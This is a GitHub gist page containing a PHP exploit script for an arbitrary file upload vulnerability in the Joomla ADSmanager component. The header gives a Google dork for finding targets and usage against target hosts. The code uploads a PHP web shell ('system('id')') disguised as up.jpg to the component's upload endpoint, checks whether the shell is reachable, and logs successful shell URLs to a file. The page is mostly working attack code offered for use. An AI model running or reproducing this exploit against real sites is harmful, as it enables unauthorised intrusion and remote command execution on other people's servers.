Skip to content

Instantly share code, notes, and snippets.

Embed
What would you like to do?
Joomla ADSmanager Exploit Arbitrary File Upload Vulnerability
<?php
/*
# AUTOR DISCOVERY: Back-DOOR - https://fb.com/Backdoor.ma
# REF: https://ghostbin.com/paste/metta , https://www.youtube.com/watch?v=4PqqBhD6ov4
# Exploit Title: Joomla ADSmanager Exploit Arbitrary File Upload Vulnerability
# TIPE: Arbitrary File Upload
# Google DORK: inurl:/index.php?option=com_adsmanager"
# EXPLOIT: /index.php?option=com_adsmanager&task=upload&tmpl=component
# Tested on: Linux
# EXECUTE: php exploit.php www.alvo.com.br
# EXECUTE: php exploit.php www.alvo.com.br/pasta
# OUTPUT: Exploit_AFU_Joomla.txt
# FILE UPLOAD: up.jpg => code shell: <?php system('id'); ?>
--------------------------------------------------------------------------------
# AUTOR SCRIPT: Cleiton Pinheiro / Nick: googleINURL
# EMAIL: inurlbr@gmail.com
# Blog: http://blog.inurl.com.br
# Twitter: https://twitter.com/googleinurl
# Fanpage: https://fb.com/InurlBrasil
# Pastebin http://pastebin.com/u/Googleinurl
# GIT: https://github.com/googleinurl
# PSS: http://packetstormsecurity.com/user/googleinurl
# EXA: http://exploit4arab.net/author/248/Cleiton_Pinheiro
# YOUTUBE: http://youtube.com/c/INURLBrasil
# PLUS: http://google.com/+INURLBrasil
*/
error_reporting(1);
set_time_limit(0);
ini_set('display_errors', 1);
ini_set('max_execution_time', 0);
ini_set('allow_url_fopen', 1);
ob_implicit_flush(true);
ob_end_flush();
function __plus() {
ob_flush();
flush();
}
function __request($params) {
$objcurl = curl_init();
curl_setopt($objcurl, CURLOPT_URL, "{$params['host']}/index.php?option=com_adsmanager&task=upload&tmpl=component");
curl_setopt($objcurl, CURLOPT_POST, 1);
curl_setopt($objcurl, CURLOPT_HEADER, 1);
curl_setopt($objcurl, CURLOPT_REFERER, $params['host']);
curl_setopt($objcurl, CURLOPT_POSTFIELDS, array("file" => "@up.jpg", "name" => "up.php"));
curl_setopt($objcurl, CURLOPT_SSL_VERIFYHOST, 0);
curl_setopt($objcurl, CURLOPT_SSL_VERIFYPEER, 0);
curl_setopt($objcurl, CURLOPT_CONNECTTIMEOUT, 10);
curl_setopt($objcurl, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($objcurl, CURLOPT_FOLLOWLOCATION, 1);
$info['corpo'] = curl_exec($objcurl);
$info['server'] = curl_getinfo($objcurl);
curl_close($objcurl);
$gh = get_headers($params['cmd'], 1);
foreach ($gh as $key => $value) {
echo " [INFO][{$key}]:: {$value}\n";
}
$_x = (strstr(($gh[0] . (isset($gh[1]) ? $gh[1] : NULL)), '200'));
echo "--------------------------------------------------------------\n";
print " [INFO][COD]:: " . (!empty($_x) ? '[+] VULL' : "[-] NOT VULL\n");
if (strstr($info['corpo'], '"tmpfile" : "up.php"')) {
print "\n [INFO][URL][SHELL]:: " . (!empty($_x) ? "[+] {$params['cmd']}" . file_put_contents("Exploit_AFU_Joomla.txt", "{$params['cmd']}\n\n", FILE_APPEND) : '[-] ERROR!');
print "\n [INFO] Successfully Upload!\n";
}
echo "--------------------------------------------------------------\n";
}
echo "\n [+] Joomla ADSmanager Exploit Arbitrary File Upload Vulnerability\n\n";
$params = array('cmd' => "{$argv[1]}/tmp/plupload/up.php", 'host' => isset($argv[1]) ? (strstr($argv[1], 'http') ? $argv[1] : "http://{$argv[1]}") : exit("\n0x[ERRO] DEFINE TARGET!\n"));
__request($params) . __plus();
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
You can’t perform that action at this time.